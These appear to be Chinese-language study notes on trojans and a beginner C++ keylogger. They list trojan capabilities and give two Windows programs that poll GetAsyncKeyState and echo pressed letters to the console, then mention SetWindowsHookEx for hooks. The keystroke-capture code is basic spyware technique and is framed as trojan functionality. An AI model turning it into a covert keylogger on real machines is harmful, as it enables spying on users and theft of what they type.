C++项目-键盘记录器 18-11-25

C++项目 18-11-25

1.木马

1.定义

特洛伊木马是指潜伏在用户电脑中，窃取本机信息或控制权的程序，而程序所执行的操作并非出于用户意愿。

2.木马与病毒的区别

1.木马与病毒最大的区别是：木马不会传播
2.病毒是以破坏为目的

3.木马可能拥有的功能

1.后门：方便下次再进入
2.Rootik：隐藏自身（不被发现），都是在Ring0层做的（Ring0层为硬件层）
3.远程控制：拥有该功能的木马体积非常大
4.键盘记录
5.Dropper（下载者）：体积非常小，通常只有几kb

2.键盘记录器

1.简单的触发空格键的小程序

#include <iostream>
#include <windows.h>

using namespace std;

int main()
{
	while (true)
	{
		cout << GetAsyncKeyState(VK_SPACE) << endl;
	}


	system("pause");
	return 0;
}

运行结果：会不断显示0，当按下空格键时会显示 -32767。

2.简单记录键盘按键的程序

#include <iostream>
#include <windows.h>

using namespace std;

int main()
{
	// 2.简单记录键盘按键的程序
	while (true)
	{
		if(-32767 == GetAsyncKeyState(VK_SPACE))
			cout << " ";
		else if(-32767 == GetAsyncKeyState('A'))
			cout << "A";
		else if(-32767 == GetAsyncKeyState('B'))
			cout << "B";
		else if(-32767 == GetAsyncKeyState('C'))
			cout << "C";
		else if(-32767 == GetAsyncKeyState('D'))
			cout << "D";
		else if(-32767 == GetAsyncKeyState('E'))
			cout << "E";
		else if(-32767 == GetAsyncKeyState('F'))
			cout << "F";
		else if(-32767 == GetAsyncKeyState('G'))
			cout << "G";
		else if(-32767 == GetAsyncKeyState('H'))
			cout << "H";
		else if(-32767 == GetAsyncKeyState('I'))
			cout << "I";
		else if(-32767 == GetAsyncKeyState('J'))
			cout << "J";
		else if(-32767 == GetAsyncKeyState('K'))
			cout << "K";
		else if(-32767 == GetAsyncKeyState('L'))
			cout << "L";
		else if(-32767 == GetAsyncKeyState('M'))
			cout << "M";
		else if(-32767 == GetAsyncKeyState('N'))
			cout << "N";
		else if(-32767 == GetAsyncKeyState('O'))
			cout << "O";
		else if(-32767 == GetAsyncKeyState('P'))
			cout << "P";
		else if(-32767 == GetAsyncKeyState('Q'))
			cout << "Q";
		else if(-32767 == GetAsyncKeyState('R'))
			cout << "R";
		else if(-32767 == GetAsyncKeyState('S'))
			cout << "S";
		else if(-32767 == GetAsyncKeyState('T'))
			cout << "T";
		else if(-32767 == GetAsyncKeyState('U'))
			cout << "U";
		else if(-32767 == GetAsyncKeyState('V'))
			cout << "V";
		else if(-32767 == GetAsyncKeyState('W'))
			cout << "W";
		else if(-32767 == GetAsyncKeyState('X'))
			cout << "X";
		else if(-32767 == GetAsyncKeyState('Y'))
			cout << "Y";
		else if(-32767 == GetAsyncKeyState('Z'))
			cout << "Z";
		else if(-32767 == GetAsyncKeyState(VK_RETURN))
			cout << endl;

	}


	system("pause");
	return 0;
}

3.HOOK（钩子）

1.为了使程序执行转向其他方向
2.SetWindowsHookEX(钩子类型，回调函数，实例句柄，线程ID)